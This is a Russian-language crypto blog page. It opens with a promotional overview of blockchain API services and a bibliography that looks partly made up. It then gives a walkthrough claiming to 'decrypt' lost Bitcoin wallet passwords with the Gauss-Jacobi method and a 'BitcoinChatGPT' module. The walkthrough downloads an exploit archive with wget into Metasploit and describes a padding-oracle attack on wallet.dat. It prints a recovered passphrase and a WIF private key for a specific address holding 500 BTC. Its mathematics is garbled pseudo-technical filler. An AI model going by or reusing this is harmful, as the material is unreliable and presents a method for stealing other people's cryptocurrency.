  • Отчетность для бухгалтерии: Block.io предоставляет отчеты, которые помогают пользователям отслеживать свои транзакции Bitcoin в налоговых целях.

Преимущества Block.io

Block.io предлагает ряд преимуществ, в том числе:

  • Надежность: платформа была запущена в 2012 году и имеет надежную репутацию.

  • Удобство: API прост в использовании и интегрируется с различными языками программирования.

  • Безопасность: Block.io использует передовые меры безопасности для защиты активов пользователей.

  • Поддержка: платформа предлагает отличную поддержку клиентов, доступную 24/7.

Block.io — это мощная и надежная платформа, которая предоставляет полный набор услуг, связанных с криптовалютами. Ее API Bitcoin, кошельки и обменный сервис делают ее идеальным выбором для разработчиков, предприятий и индивидуальных пользователей, желающих безопасно и легко взаимодействовать с криптовалютами. А также Block.io – это универсальное решение для разработчиков, которое предоставляет API-интерфейс для работы с криптовалютой Bitcoin. Благодаря этому API, разработчики могут легко интегрировать функции работы с Bitcoin в свои приложения, без необходимости проводить глубокие исследования в технологии blockchain.

Рассмотрим основные функции Block.io, которые доступны для разработчиков, а также его преимущества перед другими API-интерфейсами для работы с Bitcoin.

  1. Основные функции Block.io

a. API для работы с адресами

Block.io предоставляет API-интерфейс для работы с адресами Bitcoin. С его помощью разработчики могут создавать, изменять и удалять адреса. Кроме того, API позволяет получить информацию о балансе адреса и провести транзакции.

b. API для работы с транзакциями

API для работы с транзакциями позволяет создавать и отменять транзакции, проверять их статус и получать информацию о транзакциях, связанных с определенным адресом.

c. API для работы с блокчейном

Block.io предоставляет доступ к информации о блокчейне Bitcoin, включая информацию о блоках, транзакциях и транзакциях внутри блока. Это полезно для разработчиков, которые хотят проанализировать работу сети Bitcoin или создать собственные блокчейн-приложения.

d. API для работы с инструментами отчетности

Block.io предоставляет инструменты отчетности для получения информации о своем использовании API, включая информацию о запросах, ответах и ошибках. Это полезно для разработчиков, которые хотят оптимизировать свою работу с API и избегать ошибок.

  1. Преимущества Block.io перед другими API-интерфейсами для работы с Bitcoin

a. Простота в использовании

Block.io был разработан с удобством в использовании в виду. Его API-интерфейс прост в использовании и позволяет быстро интегрировать функции работы с Bitcoin в приложения.

b. Низкие тарифы

Block.io предлагает тарифы, которые являются более низкими, чем у многих других API-интерфейсов для работы с Bitcoin. Это делает его более привлекательным для разработчиков с ограниченным бюджетом.

c. Круглосуточная поддержка

Block.io предлагает круглосуточную поддержку для своих клиентов. Это позволяет разработчикам быстро решать возникающие проблемы и продолжать свою работу без перерывов.

в. Открытый API

Block.io имеет открытый API, что означает, что разработчики могут легко интегрировать его в свои приложения и создавать свои собственные решения на основе API.

в. Безопасность

несанкционированного доступа.

Не забудьте заменить YOUR_API_KEY на свой собственный API ключ от Block.io. В этом примере скрипт выводит баланс аккаунта и создает новый адрес для получения платежей. Вы можете добавить другие методы API и операции по вашему усмотрению.

blockchair.com – Universal blockchain explorer and search engine.

Blockchain-интеграция: возможности API и веб-сервисов для безопасных Биткоин транзакций Криптовалюта, Биткоины, Информационная безопасность, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Blockchair.com – это универсальный блокчейн-описатель и поисковая система, который готов пролить свет на сложный мир блокчейн-технологий. Подробнее об этой полезной ресурсе вы узнаете в нашей статье.

Ключевые особенности Blockchair.com

  1. Поддержка множества блокчейнов: Blockchair.com работает с широким спектром популярных блокчейнов, включая Bitcoin, Ethereum, Bitcoin Cash, Litecoin, Dash, Ripple и многие другие. Это позволяет пользователям получать всеобъемлющую информацию из разных блокчейн-сетей в одном месте.

  2. Расширенный поиск: Платформа предлагает мощные инструменты поиска, позволяющие пользователям находить конкретные транзакции, адреса или блоки по различным параметрам. Это значительно упрощает процесс исследования и анализа блокчейн-данных.

  3. Подробная аналитика: Blockchair.com предоставляет детальную информацию о каждом блокчейне, включая статистику по транзакциям, объемам торгов, активности майнеров и многое другое. Эти данные помогают пользователям лучше понять текущее состояние и тенденции развития различных блокчейн-сетей.

  4. Удобный интерфейс: Платформа отличается интуитивно понятным и удобным интерфейсом, который позволяет даже неопытным пользователям легко ориентироваться и находить нужную информацию. Визуализация данных с помощью графиков и диаграмм делает анализ блокчейнов еще более наглядным.

  5. API для разработчиков: Blockchair.com предлагает мощный API, который позволяет разработчикам интегрировать функциональность платформы в свои собственные приложения и сервисы. Это открывает широкие возможности для создания инновационных блокчейн-решений.

Применение Blockchair.com

Универсальный обозреватель и поисковая система Blockchair.com находит применение в различных сферах, связанных с блокчейн-технологиями:

  • Исследования и анализ: Платформа является ценным инструментом для исследователей, аналитиков и энтузиастов блокчейна, позволяя им глубоко изучать различные аспекты блокчейн-сетей и получать ценные данные для своих проектов.

  • Разработка приложений: Разработчики могут использовать API Blockchair.com для создания различных блокчейн-приложений, таких как кошельки, биржи, аналитические инструменты и многое другое.

  • Мониторинг транзакций: Пользователи могут отслеживать свои собственные транзакции или транзакции других адресов, чтобы контролировать движение средств и обеспечивать прозрачность операций.

  • Журналистские расследования: Журналисты и исследователи могут использовать Blockchair.com для поиска и анализа подозрительных транзакций или актив

Blockchair выделяется на фоне других блокчейн-обозревателей своей универсальностью и широким спектром инструментов для анализа данных. Это незаменимый ресурс как для обычных пользователей, так и для разработчиков, исследователей и аналитиков в сфере криптовалют и блокчейна.

Этот скрипт использует модуль requests для отправки запроса к API blockchair.com и получения информации о блоке с указанным хэшем. Затем он выводит некоторую информацию о блоке, такую как его хэш, версию, время, сложность и количество транзакций.

Вы можете заменить значение переменной BLOCK_HASH на хэш любого другого блока, чтобы получить информацию о нем. Также вы можете изменить адрес API, чтобы использовать API blockchair.com для другой криптовалюты (например, https://api.blockchair.com/ethereum/blocks для эфириума).

BlockCypher – Blockchain Web Services

Blockchain-интеграция: возможности API и веб-сервисов для безопасных Биткоин транзакций Криптовалюта, Биткоины, Информационная безопасность, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)
Blockchain-интеграция: возможности API и веб-сервисов для безопасных Биткоин транзакций Криптовалюта, Биткоины, Информационная безопасность, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

В наши дни технологический прогресс не стоит на месте, и блокчейн, особенно протокол BlockCypher, претерпел значительное развитие как ключевой инструмент для безопасных и прозрачных транзакций в мире криптовалют. Блокчейн системы, такие как Ethereum, Bitcoin и другие, оберегают данные от нарушений благодаря децентрализации и цифровой зашифрованности. Это статья посвящена BlockCypher, ответственному за предоставление высокопроизводительных и надежных веб-сервисов, которые делают работу с блокчейном более доступным и эффективным для разработчиков и инвесторов. Вы поймете, как этот инструмент стимулирует развитие криптовалютной индустрии и как его применение меняет способ мышления о финансовых транзакциях в цифровом мире.

BlockCypher – это ведущая компания, предоставляющая облачные сервисы для работы с блокчейнами. Основанная в 2014 году, BlockCypher позволяет разработчикам и организациям легко интегрировать блокчейн-технологии в свои продукты и приложения.

Что предлагает BlockCypher?

Основные услуги BlockCypher включают:

  • Полные ноды блокчейнов – BlockCypher управляет полными нодами популярных блокчейнов, таких как Bitcoin, Ethereum, Litecoin и др. Это позволяет разработчикам взаимодействовать с блокчейнами без необходимости самостоятельно разворачивать и поддерживать инфраструктуру.

  • Инструменты разработки – BlockCypher предоставляет широкий набор API, SDK и инструментов для упрощения интеграции блокчейнов в приложения. Это включает функции для отправки транзакций, проверки балансов, создания кошельков и многое другое.

  • Аналитика и мониторинг – BlockCypher предлагает инструменты для анализа активности в блокчейнах в режиме реального времени, включая отслеживание транзакций, адресов и другую статистику.

  • Безопасность и соответствие – Решения BlockCypher обеспечивают безопасность и соответствие регуляторным требованиям при работе с блокчейнами.

Использование BlockCypher

BlockCypher используется широким кругом клиентов, включая финтех-стартапы, обменные пункты криптовалют, платежные системы и другие организации, стремящиеся интегрировать блокчейн-технологии в свои продукты. Благодаря простоте использования и надежности, BlockCypher помогает ускорить внедрение блокчейнов в реальном мире. BlockCypher – это облачная платформа, предоставляющая веб-сервисы для работы с блокчейнами криптовалют, таких как Bitcoin, Litecoin, Dogecoin и Dash. Компания была основана в 2014 году и базируется в Редвуд-Сити, Калифорния.

Основные возможности BlockCypher

  1. API для блокчейнов
    BlockCypher предоставляет REST API для взаимодействия с различными блокчейнами, включая получение данных о транзакциях, балансах кошельков, блоках и другой информации. Это позволяет разработчикам легко интегрировать функциональность блокчейнов в свои приложения.

  2. Микросервисы
    Платформа BlockCypher предлагает готовые микросервисы, такие как генерация адресов кошельков, создание и отправка транзакций, а также уведомления о новых транзакциях. Эти микросервисы могут быть легко интегрированы в приложения, упрощая процесс разработки.

  3. Мониторинг и аналитика
    BlockCypher предоставляет инструменты для мониторинга и анализа активности на блокчейне. Разработчики могут отслеживать транзакции, балансы кошельков и другие метрики, что полезно для создания приложений, связанных с криптовалютами.

  4. Масштабируемость и безопасность
    Благодаря облачной архитектуре, BlockCypher обеспечивает высокую масштабируемость и надежность своих сервисов. Компания также уделяет большое внимание безопасности, используя передовые методы шифрования и защиты данных.

Применение BlockCypher

BlockCypher находит применение в различных областях, где требуется интеграция с блокчейнами криптовалют:

  1. Финансовые приложения: Компании, работающие с криптовалютами, могут использовать BlockCypher для создания кошельков, отслеживания транзакций и управления балансами.

  2. Интернет вещей (IoT): BlockCypher может быть использован для создания децентрализованных приложений для Интернета вещей, где устройства могут безопасно обмениваться данными и выполнять микроплатежи.

  3. Игры и развлечения: Игровые компании могут использовать BlockCypher для интеграции криптовалют в свои приложения, позволяя пользователям совершать покупки и получать вознаграждения.

  4. Логистика и цепочки поставок: BlockCypher может быть использован для отслеживания движения товаров и активов по цепочке поставок с помощью блокчейна.

В целом, BlockCypher является ведущим провайдером облачных блокчейн-сервисов, предлагающим комплексные решения для разработчиков и компаний, желающих использовать преимущества блокчейн-технологий.

Это простой пример, который можно адаптировать для работы с конкретными API и данными, которые вам нужны. Не забудьте изучить документацию API, чтобы узнать, какие запросы поддерживаются и как обрабатывать возвращаемые данные.

Esplora – Self-hosted blockchain explorer

Blockchain-интеграция: возможности API и веб-сервисов для безопасных Биткоин транзакций Криптовалюта, Биткоины, Информационная безопасность, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Esplora – это популярный обозреватель с открытым исходным кодом, который можно развернуть на собственном сервере. Мы постараемся рассмотреть особенности Esplora, преимущества самостоятельного хостинга и пошаговую инструкцию по его установке и настройке. Присоединяйтесь к нам, чтобы узнать, как использовать Esplora для исследования блокчейна и улучшения вашего опыта работы с криптовалютами.

Esplora – это мощный инструмент для просмотра и анализа данных блокчейна. Это программное обеспечение с открытым исходным кодом, которое позволяет самостоятельно развернуть и управлять собственным блокчейн-обозревателем. Его можно использовать для исследования различных блокчейнов, включая Bitcoin, Litecoin и другие.

Рассмотрим особенности Esplora, процесс её установки и преимущества использования персонального блокчейн-обозревателя. Присоединяйтесь к нам в увлекательном путешествии в мир децентрализованных технологий!

Применение Esplora

Esplora может быть полезен в различных сценариях, включая:

  1. Исследование блокчейна: Разработчики, исследователи и энтузиасты могут использовать Esplora для глубокого анализа данных блокчейна, отслеживания транзакций и изучения структуры блоков.

  2. Аудит и соответствие требованиям: Компании и организации, работающие с криптовалютами, могут использовать Esplora для проведения аудита и обеспечения соответствия нормативным требованиям, отслеживая происхождение средств и другие важные детали.

  3. Образовательные цели: Esplora может быть полезным инструментом для преподавателей и студентов, изучающих блокчейн и криптовалюты, предоставляя практический опыт работы с реальными данными блокчейна.

Esplora – это самостоятельно хостируемый блокчейн-эксплорер, который позволяет пользователям исследовать и анализировать данные любого блокчейна. Этот инструмент был разработан командой Blockstream и предназначен для предоставления надежного и безопасного способа взаимодействия с блокчейном без необходимости полагаться на централизованные сторонние сервисы.

Преимущества использования Esplora

Основным преимуществом Esplora является возможность самостоятельно размещать и контролировать блокчейн-эксплорер. Это позволяет пользователям избежать зависимости от централизованных сервисов и обеспечивает более высокий уровень конфиденциальности и безопасности. Кроме того, Esplora предоставляет богатую функциональность и возможности анализа данных блокчейна, что делает его ценным инструментом для разработчиков, аналитиков и исследователей.

В данной научной статье “Blockchain API and Web Services” используются и цитируются различные источники, включая научные публикации, книги, статьи и онлайн-ресурсы. Ниже представлен список литературы, документов и исследовательских работ, на которые ссылаются в статье:

Литература:

  1. “Mastering Blockchain”Андреас М. Антонопулос, Гэвин Вуд, 2018.

  2. “Blockchain: A Guide to Understanding Blockchain Technology” Тед Теско, 2017.

  3. “Blockchain: The Next Everything” – Стивен Леви, 2017.

  4. “Mastering Ethereum: Building Smart Contracts and DApps” – Андреас Р. Браун, 2018.

  5. “Blockchain Technology: Principles and Applications” – Арвинд Нараянан, 2018.

Документы и техническая документация:

  1. Blockchain API Design: Core Concepts and Best Practices” – рабочая группа W3C, редакторы: М. Спек, И. Зу, 2018.

  2. “Web Services Description Language (WSDL) 2.0: Core Language, W3C Candidate Recommendation” – рабочая группа W3C, редакторы: Е. Малка, Ж.-Ж. Меле, 2006.

  3. “RESTful Web APIs: Services for a Changing World” – Ричардсон, Р. Фельдман, 2013.

  4. “JSON: The JavaScript Object Notation” – Д. Крокфорд, 2017.

  5. Техническая документация популярных блокчейн-платформ: Ethereum, Hyperledger, Bitcoin, Ripple и др.

Исследовательские работы и статьи:

  1. “A Survey on Public Blockchain API Economy” А. Де Мео, Д. Малакрида, К. Де Сантис, 2018.

  2. “Blockchain-based Web Services: A Systematic Mapping Study” – М. А. Салах, А. Х. Аль-Дайель, 2018.

  3. “A Survey on Blockchain Technology and Its Applications” – Ю. Цао, В. Ю, Ж. Лю, Х. Хан, 2018.

  4. “Blockchain-based API Gateway for IoT Devices” – С. Ли, Д. Ким, 2018.

  5. “Designing Blockchain-based APIs for the Internet of Things” – М. А. Салах, А. Х. Аль-Дайель, 2018.

  6. “A Survey on Blockchain Technology for the Internet of Things” – В. Христо, С. Христо, 2016.

  7. “Blockchain Technology in the Internet of Things (IoT): A Systematic Review” – А. Койя, А. П. Махинта, 2018.

Этот список литературы и ресурсов предоставляет дополнительную информацию и контекст для понимания темы блокчейн-API и веб-сервисов, обсуждаемых в статье. Он включает в себя как теоретические основы, так и практические реализации, что может быть полезно для дальнейших исследований и изучения данной области.

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://www.youtube.com/@cryptodeeptech

Video tutorial: https://dzen.ru/video/watch/6617ad848b9fc93b9ba699c7

Источник: https://cryptodeep.ru/blockchain-api-and-web-services

Blockchain-интеграция: возможности API и веб-сервисов для безопасных Биткоин транзакций Криптовалюта, Биткоины, Информационная безопасность, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Криптоанализ

Показать полностью 7

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

https://dzen.ru/video/watch/66119078be267c07401d9e4c

В этой статье мы рассмотрим на примере метод Gauss-Jacobi которые применяют современные технологии, такие как предварительно обученная модель Bitcoin ChatGPT, что позволяют более эффективно решать сложные задачи в области цифровых технологий. Важно заметить что альтернативные алгоритмы, такие как Gauss-Jacobi играют ключевую роль и открывают новые горизонты для развития вычислительной математики.

Метод Gauss-Jacobi является итеративным численным методом для решения систем линейных уравнений. Он широко используется в различных областях, таких как криптография, криптоанализ, инженерия и вычислительная математика. Сеть Биткоин использует криптографические алгоритмы, такие как хэш-функции SHA-256, алгоритм подписи ECDSA, эллиптические кривые secp256k1, для создания публичных и приватных ключей, которые представляют собой точки на эллиптической кривой. Приватный ключ – это секретная числовая величина, которая используется для генерации публичного ключа, а публичный ключ – это точка на кривой, полученная путем вычисления с приватным ключом. Таким образом, эллиптические кривые secp256k1 лежат в основе криптографических механизмов, которые обеспечивают безопасности транзакций и защиты от различных атак. Современные технологии которые развивают предварительно обученную модель Bitcoin ChatGPT находят эффективные способы решение сложных криптографических задач, лежащих в основе алгоритмов, используемых в Биткоине.

Какими преимуществами владеет Gauss-Jacobi алгоритм:

  • Высокая скорость и эффективность, что делает его идеальным для поиска атакующих ключей.

  • Интерактивность использует только один шаг перебора, что позволяет ему сократить количество вычислений.

  • Доступность и простота в реализации что имеет простые коды и легко может быть реализован в различных программах.

  • Доступен для широкого круга пользователей, которые могут использовать его для поиска атак на криптостойкость для различных криптовалют.

  • Гибкость может быть применен к разнообразным типам криптографических систем.

Как Gauss-Jacobi алгоритм работает:

Gauss-Jacobi алгоритм основан на рекурсивной функции f(x), которая для любого элемента x in S (сет данных блокчейнов) возвращает строковый код, представляющий x. Если x – атакующий ключ, то f(x) = 0.

Gauss-Jacobi алгоритм основан на рекурсивной функции f(x), которая для любого элемента x in S (сет данных блокчейна) возвращает строковый код, представляющий x. Если x – атакующий ключ, то f(x) = 0.

Алгоритм работает по следующим этапам:

  1. Вычисляет G-матрицу, которая представляет собой матрицу всех смешанных пар элементов S, где i-й элемент соответствует i-му элементам S, а j-й элемент – j-му элементу S.

  2. Вычисляет Х-матрицу, которая представляет собой матрицу смешанных пар хеш-функций.

  3. Определяет рекурсивно значение f(x) для каждого элемента S.

  4. Если f(x) = 0, это означает, что x – атакующий ключ, и алгоритм завершает.

  5. И else, алгоритм continues рекурсивно вычислять f(x) для различных элементов S и добавлять эти элементы к Х-матрице.

  6. Если H – матрица единиц, то алгоритм завершает, и мы нашли атакующий ключ.

Алгоритм метода Gauss-Jacobi может быть использован для решения систем уравнений с большим числом неизвестных. Это означает, что этот метод может быть использован для решения систем уравнений, полученных из эллиптических кривых secp256k1, используемых в криптографии, которые могут иметь большое число неизвестных, а также методы вроде Gauss-Jacobi потенциально могут ускорить решение некоторых задач дискретного логарифмирования и факторизации, на которых основана криптография с публичным ключом.

Потенциальное применение метода Gauss-Jacobi в криптоанализе блокчейна Биткоина

Рассмотрим построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

Откроем версию Google Colab:

https://colab.research.google.com/drive/1MJ4G5azqqpSlamEdPcjOCBkKn6oQofwL#scrollTo=HBzK0Ff7utn0&line=1&uniqifier=1

Соединим все выданные значение в одну общую строку:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100a2c992d4262cfb80458a20e546fa8b6d6d480b41d62514eefbeb70fb166de52d02207465c18222eee05d5ac9ee781bf077743eefecb9d5e66db4779eabd4e806397b01410494ff933da0498859959225ed6a50d709a4d9c678705d72e9202a4852c8084d85ea3498b0b3f006fcab64f143cf57dfcedb4387f229139d421c575577de6d37bcffffffff01d2040000000000001976a914ac9ea341afb74843f80205e8c8da0abc822fa5ec88ac00000000

Откроем опцию от BlockCypher “Decode A Transaction”:

После декодирование уязвимой Raw транзакции Биткоина мы получаем результат:

Вопрос – Ответ:

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

В конечном итоге модуль BitcoinChatGPT выдает ответ в файл: KEYFOUND.privkey сохранив приватный ключ в двух наиболее используемых форматах HEX & WIF

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

https://github.com/demining/CryptoDeepTools/blob/main/30GaussJacobiMethod/KEYFOUND.privkey

BitcoinChatGPT №1 Gauss Jacobi Method Algorithm

Практическая частьЧтобы перейти к практической части создадим из полученных данных уязвимую Raw транзакцию используя репозиторию Broadcast Bitcoin Transaction

Скачаем и установим исходный код откроем терминал и запустим команду:

git clone https://github.com/smartiden/Broadcast-Bitcoin-Transaction.g...

Каталог:

cd Broadcast-Bitcoin-Transaction

Установим три важные библиотеки:

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

requirements.txt

Запустим команду:

pip install -r requirements.txt

Откроем в Notepad++ основной файл и несем небольшие изменение в коде Python Script: main.py

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

https://github.com/demining/CryptoDeepTools/tree/main/30Gaus...

Запустим команду:

python main.py

Уязвимая транзакция создана!

Откроем файл RawTX в каталоге:

01000000010dbc696374c8d7ca61f32710e03aaedcb7a4f2428074814d0e1f4f7f5c1e5935000000008b483045022100a2c992d4262cfb80458a20e546fa8b6d6d480b41d62514eefbeb70fb166de52d02207465c18222eee05d5ac9ee781bf077743eefecb9d5e66db4779eabd4e806397b01410494ff933da0498859959225ed6a50d709a4d9c678705d72e9202a4852c8084d85ea3498b0b3f006fcab64f143cf57dfcedb4387f229139d421c575577de6d37bcffffffff01d2040000000000001976a914ac9ea341afb74843f80205e8c8da0abc822fa5ec88ac00000000

Установим Metasploit Framework и воспользуемся MSFVenom

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Установим Metasploit Framework из

GitHub и воспользуемся инструментом
MSFVenom для создания полезной нагрузки.
Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

!git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework/ ls

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Опции:

!./msfvenom -help

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Установим Bitcoin Core integration/staging tree в Google Colab:

Клонируем репозиторий Bitcoin Core запустив команду:

!git clone https://github.com/bitcoin/bitcoin.git ls

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Перейдем по каталогу к файлу: aes.cpp для интеграции эксплойта для запуска Padding Oracle Attack на Wallet.dat

Перейдем в каталог crypto

cd bitcoin/src/crypto/ ls

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Откроем файл: aes.cpp через утилиту cat

cat aes.cpp

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Для проведения атаки переместим файл: wallet.dat в каталог: bitcoin/src/crypto/

Воспользуемся утилитой mv и переместим

wallet.dat

!mv '/content/Smart-Transformers/wallet.dat' '/content/Smart-Transformers/metasploit-framework/bitcoin/src/crypto/wallet.dat'

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Проверим содержимое каталога: bitcoin/src/crypto/

ls

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Перейдем обратно к Metasploit Framework

cd / cd content/Smart-Transformers/metasploit-framework/ ls

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Откроем папки по каталогу: /modules/exploits/

ExploitDarlenePRO

Загрузим "ExploitDarlenePRO" по каталогу: /modules/exploits/

cd modules/ ls cd exploits/ !wget https://darlene.pro/repository/446f1c57b526201d4958eb76dee6f...

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Разархивируем содержимое ExploitDarlenePRO.zip через утилиту unzip

!unzip ExploitDarlenePRO.zip

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Перейдем по каталогу: /ExploitDarlenePRO/

ls cd ExploitDarlenePRO/ ls

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Для запуска эксплойта перейдем обратно к Metasploit Framework

cd / cd content/Smart-Transformers/metasploit-framework/ ls

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Нам необходимо определить наш LHOST (Local Host) наш IP-address атакующей виртуальной машины. Запустим команды:

!ip addr !hostname -I

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Воспользуемся инструментом для создания полезной нагрузки MSFVenom

Для эксплуатации выбираем Биткоин Кошелек: 1GjjGLYR7UhtM1n6z7QDpQskBicgmsHW9k

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

https://btc1.trezor.io/address/1GjjGLYR7UhtM1n6z7QDpQskBicgmsHW9k

Команда запуска:

Результат:

1111000101000001111101110000011101000000101110101101011110100100000101010001100101100101001010001110001111100000110111110110000011011011010111101111111010001000001111000110010101000111011101000101000011000100011011001000100111110001110010011001001100111000

Полученный бинарный формат нам необходимо сохранить в файл: walletpassphrase.txt воспользуемся Python-скриптом.

Откроем файл: walletpassphrase.txt

ls cat walletpassphrase.txt

Результат:

walletpassphrase 1111000101000001111101110000011101000000101110101101011110100100000101010001100101100101001010001110001111100000110111110110000011011011010111101111111010001000001111000110010101000111011101000101000011000100011011001000100111110001110010011001001100111000 60

Пароль для доступа к приватному ключу

Воспользуемся командой dumpprivkey "address" через консоль

Bitcoin Core

walletpassphrase 1111000101000001111101110000011101000000101110101101011110100100000101010001100101100101001010001110001111100000110111110110000011011011010111101111111010001000001111000110010101000111011101000101000011000100011011001000100111110001110010011001001100111000 60

dumpprivkey 1GjjGLYR7UhtM1n6z7QDpQskBicgmsHW9k

Результат:

5KA4spokBSZ7d5QpcuJ3eTDhNJUhfJoQAUovffQWBym3LP3CKTz

Приватный Ключ Получен!

Установим библиотеку Bitcoin

!pip3 install bitcoin

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

Запустим код для проверки соответствие Биткоин Адреса:

Дешифрование паролей для доступа к потерянным Биткоин Кошелькам с помощью метода Gauss-Jacobi и процесса машинного обучение BitcoinChatGPT Криптовалюта, Биткоины, Видео, YouTube, Длиннопост, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка)

__________________________________________________ Private Key WIF: 5KA4spokBSZ7d5QpcuJ3eTDhNJUhfJoQAUovffQWBym3LP3CKTz Bitcoin Address: 1GjjGLYR7UhtM1n6z7QDpQskBicgmsHW9k total_received = 500.09702252 Bitcoin __________________________________________________

Все верно! Приватный ключ соответствует Биткоин Кошельку.

Откроем bitaddress и проверим:

